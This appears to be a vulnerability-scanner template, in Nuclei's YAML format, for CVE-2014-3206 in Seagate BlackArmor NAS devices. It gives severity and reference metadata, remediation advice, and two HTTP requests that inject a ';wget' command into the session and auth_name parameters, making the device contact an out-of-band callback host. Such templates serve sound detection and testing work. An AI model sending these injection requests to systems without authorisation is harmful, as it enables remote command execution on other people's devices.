47 lines
1.6 KiB
YAML
47 lines
1.6 KiB
YAML
id: CVE-2014-3206
|
|
|
|
info:
|
|
name: Seagate BlackArmor NAS - Command Injection
|
|
author: gy741
|
|
severity: critical
|
|
description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
|
|
remediation: |
|
|
Apply the latest firmware update provided by Seagate to patch the command injection vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-3206
|
|
- https://www.exploit-db.com/exploits/33159
|
|
- https://www.exploit-db.com/exploits/33159/
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2014-3206
|
|
cwe-id: CWE-20
|
|
epss-score: 0.54379
|
|
epss-percentile: 0.97248
|
|
cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: seagate
|
|
product: blackarmor_nas_220_firmware
|
|
tags: cve,cve2014,seagate,rce,edb
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
- |
|
|
GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
|
|
unsafe: true
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
# digest: 4a0a0047304502205db8876b5b301796875b9967aec6a5bd435b722ca46d8e19d654c0b371460a060221008a926315d45755ef8ea20de9cf35f59f3c7dd5e282909dbd9fd2db551fab8dcc:922c64590222798bb761d5b6d8e72950
|